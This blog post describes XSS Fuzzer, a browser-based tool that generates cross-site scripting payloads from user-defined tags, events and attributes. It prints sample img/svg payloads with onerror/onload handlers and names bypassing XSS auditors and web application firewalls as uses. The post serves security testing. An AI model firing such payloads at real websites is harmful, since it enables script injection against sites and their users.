Categories: Kali Linux

XSS Fuzzer : Tool Which Generates XSS Payloads Based On User-Defined Vectors & Fuzzing Lists

XSS Fuzzer is a simple application written in plain HTML/JavaScript/CSS which generates XSS payloads based on user-defined vectors using multiple placeholders which are replaced with fuzzing lists.

It offers the possibility to just generate the payloads as plain-text or to execute them inside an iframe. Inside iframes, it is possible to send GET or POST requests from the browser to arbitrary URLs using generated payloads.

Also ReadMCExtractor – Intel, AMD, VIA & Freescale Microcode Extraction Tool

XSS Fuzzer Why?

XSS Fuzzer is a generic tool that can be useful for multiple purposes, including:

  • Finding new XSS vectors, for any browser
  • Testing XSS payloads on GET and POST parameters
  • Bypassing XSS Auditors in the browser
  • Bypassing web application firewalls
  • Exploiting HTML whitelist features

Example

In order to fuzz, it is required to create placeholders, for example:

  • The [TAG] placeholder with fuzzing list: img svg.
  • The [EVENT] placeholder with fuzzing list: onerror onload.
  • The [ATTR] placeholder with fuzzing list: src value.
  • The payloads will use the mentioned placeholders, such as:
<[TAG] [ATTR]=Something [EVENT]=[SAVE_PAYLOAD] />

The [SAVE_PAYLOAD] placeholder will be replaced with JavaScript code such as alert(unescape(‘[PAYLOAD]’));.

This code is triggered when an XSS payload is successfully executed.

The result for the mentioned fuzzing lists and payload will be the following:

<img src=Something onerror=alert(unescape('%3Cimg%20src%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<img value=Something onerror=alert(unescape('%3Cimg%20value%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<img src=Something onload=alert(unescape('%3Cimg%20src%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<img value=Something onload=alert(unescape('%3Cimg%20value%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<svg src=Something onerror=alert(unescape('%3Csvg%20src%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<svg value=Something onerror=alert(unescape('%3Csvg%20value%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<svg src=Something onload=alert(unescape('%3Csvg%20src%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />
<svg value=Something onload=alert(unescape('%3Csvg%20value%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); />

When it is executed in a browser such as Mozilla Firefox, it will alert the executed payloads:

<svg src=Something onload=[SAVE_PAYLOAD] />
<svg value=Something onload=[SAVE_PAYLOAD] />
<img src=Something onerror=[SAVE_PAYLOAD] />

Sending requests

It is possible to use a page vulnerable to XSS for different tests, such as bypasses for the browser XSS Auditor. The page can receive a GET or POST parameter called payload and will just display its unescaped value.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

R K

Recent Posts

Nmap cheat sheet for beginners

Nmap (Network Mapper) is a free tool that helps you find devices on a network,…

8 hours ago

Understanding the Model Context Protocol (MCP) and How It Works

Introduction to the Model Context Protocol (MCP) The Model Context Protocol (MCP) is an open…

1 week ago

The file Command – Quickly Identify File Contents in Linux

While file extensions in Linux are optional and often misleading, the file command helps decode what a…

1 week ago

How to Use the touch Command in Linux

The touch command is one of the quickest ways to create new empty files or update timestamps…

1 week ago

How to Search Files and Folders in Linux Using the find Command

Handling large numbers of files is routine for Linux users, and that’s where the find command shines.…

1 week ago

How to Move and Rename Files in Linux with the mv Command

Managing files and directories is foundational for Linux workflows, and the mv (“move”) command makes it easy…

1 week ago